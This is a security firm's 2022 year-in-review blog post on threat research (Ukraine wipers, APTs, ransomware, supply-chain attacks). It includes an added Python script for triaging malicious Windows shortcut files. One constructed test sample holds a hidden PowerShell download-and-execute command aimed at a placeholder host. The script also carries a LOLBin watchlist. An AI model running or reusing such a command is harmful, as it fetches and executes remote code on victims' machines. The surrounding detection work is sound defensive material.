2022 has been another eventful year for the SentinelLabs research team, with events in Ukraine dominating and directing a large portion of our research output. We also hosted the first ever LABScon, bringing together top tier researchers and thought leaders from across the industry, and found time to investigate a number of supply chain attacks, adversaries, macOS, Linux and Windows malware, and exploitable vulnerabilities.
We’ve seen a shift in ransomware TTPs with increasing use of hybrid and partial encryption and a greater focus from threat actors on stealing data for ransom as well as – and sometimes instead of – using file lockers.
All our research and threat intelligence posts can be found on the SentinelLabs home page, but for a quick recap of the year’s main highlights, take a scroll through the 2022 timeline below.
In January, we identified new variants of the PowGoop malware belonging to the Iranian-linked threat actor MuddyWater. We described how this adversary used tunneling tools and likely exploited CVE-2020-0688 (a remote code execution flaw in the Exchange Control Panel caused by static cryptographic keys) on Exchange servers to compromise governmental organizations in the Middle East. Like many other Iranian threat actors, the group displays less sophistication and technological complexity than other state-sponsored APT groups, but it continues to be successful through its use of publicly available offensive security tools and exploitation of unpatched vulnerabilities.
January also saw SentinelLabs post research on threat hunting for macOS adware infections, recent hacktivist campaigns, and analyses of BlackCat ransomware, and CVE-2021-45608 – a flaw in NetUSB affecting millions of routers.
The Russian invasion of Ukraine in February 2022 was an event that had, and continues to have, a global impact. It was widely expected that the Russian campaign would be swift and decisive, and accompanied by an equally destructive cyber warfare campaign. Those expectations turned out to be far from correct. While the resolve of the Ukrainians took both the Russians and many observers by surprise, the cyber campaigns associated with the war also had an unexpected dimension. In February, the first of these was a new destructive wiper that SentinelLabs dubbed HermeticWiper, a code-signed wiper that abuses a legitimate partition-manager driver to corrupt the disks of Windows devices in Ukrainian organizations.
This month, SentinelLabs also exposed a decade-old state-sponsored adversary named ModifiedElephant targeting human rights activists, lawyers, academics and others involved in civilian dissent in India. The objective of ModifiedElephant is long-term surveillance that at times concludes with the delivery of ‘evidence’—files that incriminate the target in specific crimes—prior to conveniently coordinated arrests.
SentinelLabs also reported on an Iranian threat actor, TunnelVision, exploiting the Log4j2 vulnerabilities (Log4Shell, CVE-2021-44228) and other flaws against Middle East and US targets.
As the war in Ukraine gathered pace, so did the cyber attacks: WhisperKill, WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero were all reported on across the industry, but AcidRain was a new development. An attempt to take out Ukrainian military command-and-control capabilities by disrupting satellite connectivity spilled over into German infrastructure: the attack on Viasat KA-SAT modems also cut off remote monitoring and control of almost 6,000 Enercon wind turbines.
It turns out it hasn’t only been the Russians targeting Ukraine, either. In March, SentinelLabs reported on a Chinese threat actor Scarab APT attempting to infect organizations in Ukraine with HeaderTip malware. Meanwhile, multiple critical severity flaws in Microsoft Azure’s Defender for IoT were disclosed by SentinelLabs that could allow unauthenticated attackers to remotely compromise devices.
In April, SentinelLabs’ focus turned to crimeware with research on LockBit 3.0 discovering that threat actors were sideloading Cobalt Strike beacons via a signed VMware xfer logs command line utility. We subsequently discovered this technique was connected with an affiliate Microsoft tracks as DEV-0401, a threat actor that had not previously been known to use LockBit.
SentinelLabs also published on Nokoyawa ransomware in April, finding that it was clearly an evolution of Karma/Nemty rather than Hive, as some earlier analyses had suggested.
Supply-chain attacks via shared code repositories were the flavor of the month in May. SentinelLabs reported on CrateDepression this month, a supply-chain attack against the Rust development community. This followed an advisory from the Rust Security Response Working Group announcing the discovery of a malicious crate that targeted victims using GitLab Continuous Integration (CI) pipelines. Infected CI pipelines were served a second-stage payload we identified as Go binaries built on the red-teaming framework Mythic. Both macOS and Linux payloads were available to the threat actors.
Also in May, threat actors targeted PyPI with a malicious Python package in a typosquatting campaign. We noted how the macOS payload used a similar obfuscation technique to OSX.Zuru in 2021 to drop a Cobalt Strike beacon on infected devices.
June 2022 saw SentinelLabs’ research turn to focus on Chinese-linked threat activity. Our research revealed a newly-discovered APT dubbed Aoqin Dragon that had been quietly spying on government, education, and telecommunication organizations in Southeast Asia and Australia for over a decade.
We found that the threat actor had a history of using document lures with pornographic themes to infect users and typically drops one of two backdoors: Mongall and a modified version of the open source Heyoka project.
In July, SentinelLabs research discovered that a Chinese state-sponsored cyber espionage group had set its sights on Russian targets in the midst of the Ukraine war.
We also explored how malicious Windows applications packaged as APPX and MSIX installers were being used by threat actors as an alternative infection vector to Office macros. LockBit 3.0 continued to be a significant threat for many enterprises, and we published new research on LockBit’s latest anti-analysis and evasion techniques.
Furthering our research on alternative vectors in light of Microsoft’s announced lockdown of Office macros (blocking macros by default in files downloaded from the internet), SentinelLabs published on how Windows shortcuts, LNK files, were being abused by threat actors. This detailed research was based on an analysis of over 27,000 malicious LNK file samples.
We discovered that Windows Explorer (explorer.exe) was the top LOLBin (living off the land binary) in the chains of LOLBins that threat actors use to execute malware via LNK files.
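As an added example (not code from the SentinelLabs research or from any tool it describes), the Python script below builds three constructed Shell Link (.lnk) blobs in memory, parses the MS-SHLLINK header and StringData fields back out, and then flags what an analyst triaging a suspicious shortcut looks for: the chain of LOLBins named in the target path and arguments, a ShowCommand that keeps the launched window hidden, and argument padding beyond the 260 characters the Explorer Properties dialog displays. The LOLBin watchlist, the 260-character threshold, the sample paths and the 198.51.100.7 address are assumptions made for illustration.

```python
"""Triage Windows .lnk files for LOLBin execution chains (added example, not SentinelLabs code).

Only the MS-SHLLINK pieces needed here are handled: the fixed 76-byte ShellLinkHeader,
the optional LinkTargetIDList and LinkInfo blocks (skipped over), and the StringData fields.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))  # fixed on-disk order

SW_SHOWMINNOACTIVE = 7         # ShowCommand value that keeps the launched window hidden
PROPERTIES_DIALOG_LIMIT = 260  # chars of "Target" shown by Explorer; assumed heuristic threshold

# Assumed watchlist of binaries commonly chained from LNK files.
LOLBINS = {"explorer.exe", "cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe",
           "wscript.exe", "cscript.exe", "regsvr32.exe", "msiexec.exe", "certutil.exe"}


def _string_data(text):
    # StringData = CountCharacters (uint16) + UTF-16LE characters, no terminator (IsUnicode set)
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, arguments="", working_dir="", show_command=1):
    """Serialize a minimal Unicode Shell Link as test input (no IDList, no LinkInfo)."""
    flags, body = IS_UNICODE, b""
    for text, bit in ((relative_path, HAS_RELATIVE_PATH), (working_dir, HAS_WORKING_DIR),
                      (arguments, HAS_ARGUMENTS)):
        if text:
            flags |= bit
            body += _string_data(text)
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body


def parse_lnk(data):
    """Return ShowCommand plus whichever StringData fields the LinkFlags declare."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    show_command, = struct.unpack_from("<I", data, 0x3C)
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"show_command": show_command}
    width = 2 if flags & IS_UNICODE else 1
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData: %s" % name)
        pos += len(raw)
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def lolbin_chain(fields):
    """Ordered LOLBins named in the target path and its arguments (basename match)."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    chain = []
    for token in re.split(r"[\s\"']+", text):
        base = re.split(r"[\\/]", token)[-1].lower()
        if not base.endswith(".exe"):
            base += ".exe"                       # "powershell" and "powershell.exe" both count
        if base in LOLBINS:
            chain.append(base)
    return chain


def triage(data):
    """Parse one .lnk blob and return (fields, list of human-readable findings)."""
    fields = parse_lnk(data)
    findings = []
    chain = lolbin_chain(fields)
    if chain:
        findings.append("LOLBin chain: " + " -> ".join(chain))
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden via ShowCommand=SW_SHOWMINNOACTIVE")
    args = fields.get("arguments", "")
    if len(args) > PROPERTIES_DIALOG_LIMIT:
        findings.append("arguments padded to %d chars (beyond what Properties shows)" % len(args))
    return fields, findings


# Constructed samples (not real malware): explorer.exe as the launcher of a dropped script,
# a cmd -> powershell chain with whitespace padding, and a benign shortcut.
SAMPLE_EXPLORER = build_lnk("..\\..\\..\\Windows\\explorer.exe",
                            arguments="C:\\Users\\Public\\update.js",
                            show_command=SW_SHOWMINNOACTIVE)
SAMPLE_CMD = build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe",
                       arguments='/c start /min powershell -nop -w hidden -c '
                                 '"IEX (New-Object Net.WebClient).DownloadString('
                                 "'http://198.51.100.7/stage2')\"" + " " * 300,
                       working_dir="C:\\Windows\\System32",
                       show_command=SW_SHOWMINNOACTIVE)
SAMPLE_BENIGN = build_lnk("..\\..\\Windows\\System32\\notepad.exe", working_dir="C:\\Users\\alice")

if __name__ == "__main__":
    for label, blob in (("explorer", SAMPLE_EXPLORER), ("cmd", SAMPLE_CMD), ("benign", SAMPLE_BENIGN)):
        fields, findings = triage(blob)
        print(label, fields.get("relative_path"), findings or ["no findings"])
```

The same `parse_lnk` works on a real shortcut read from disk (`parse_lnk(open(path, "rb").read())`); the skipped LinkTargetIDList and LinkInfo blocks are where a fuller parser would recover the absolute target and volume details, which the StringData fields alone may omit.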
September was the month of LABScon, and unsurprisingly saw some big reveals from the SentinelLabs research team. First up came Metador, a mysterious threat actor that SentinelLabs found had been targeting telecommunications, internet service providers, and universities in several countries in the Middle East and Africa.
We also published research on Void Balaur, a cyber mercenary group running hack-for-hire campaigns throughout 2022 against targets in the United States, Russia, Ukraine, and other countries. SentinelLabs also reported on JuiceLedger, a relatively new threat actor focused on infostealing through a .NET assembly called ‘JuiceStealer’, and on its phishing campaign against PyPI contributors.
In October, our research returned to focusing on Chinese-linked APTs with research on a new threat cluster we track as WIP19.
WIP19 has been targeting telecommunications and IT service providers in the Middle East and Asia using a stolen digital certificate issued to a company called “DEEPSoft”. The activity was notable for the fact that almost all operations performed by the threat actor were conducted in a “hands-on keyboard” manner, with the attacker forgoing C2 channels in exchange for increased stealth.
As the festive and holiday season started to approach, our focus turned once again to crimeware actors that typically ramp up their activities as the year rounds to a close. Our research into SocGholish noted how the actors had significantly diversified and expanded their infrastructure for staging malware with new servers, many of which were located in Europe, with the Netherlands, the United Kingdom, and France at the top of the list.
We also covered Black Basta ransomware and were the first to note links between its tooling and the cybercrime gang FIN7. For those who missed out on LABScon, we began a series of posts on some of the presentations that took to the main stage.
SentinelLabs was as busy at the end of the year as at the beginning. In December, we published research into the crimeware group Vice Society, revealing how the group had pivoted to using a custom-branded ransomware variant we dubbed ‘PolyVice’.
We also dug deeper into Metador, exploring the anti-analysis techniques used in one of the actor’s backdoors, Mafalda. In collaboration with industry partners, we published on POORTRY and STONESTOP malware, used in active intrusions into telecommunication, BPO, MSSP, and financial services businesses.
SentinelOne was an early pioneer of the use of AI and machine learning in cybersecurity, but the technology hit public awareness in a big way with OpenAI’s release of ChatGPT. We found time to report on what this AI tool can and cannot do for malware analysis and reverse engineering, and of course, we topped off the year by sharing more LABScon talks for the rest of the cybersecurity world to enjoy and learn from.
Throughout 2022, SentinelLabs has kept defenders informed and up-to-date on the latest developments across the crimeware ecosystem, adversaries, APTs, malware campaigns and critical vulnerabilities, and we’re not quite done yet: look out for a special LABScon talk that we’ll share before the New Year.
We’ll be back in 2023 with more security research, threat intelligence and vulnerability reporting. In the meantime, we wish everyone a happy, secure and peaceful 2023. Predictions for what 2023 in cybersecurity might look like from both SentinelLabs researchers and SentinelOne thought leaders can be found here.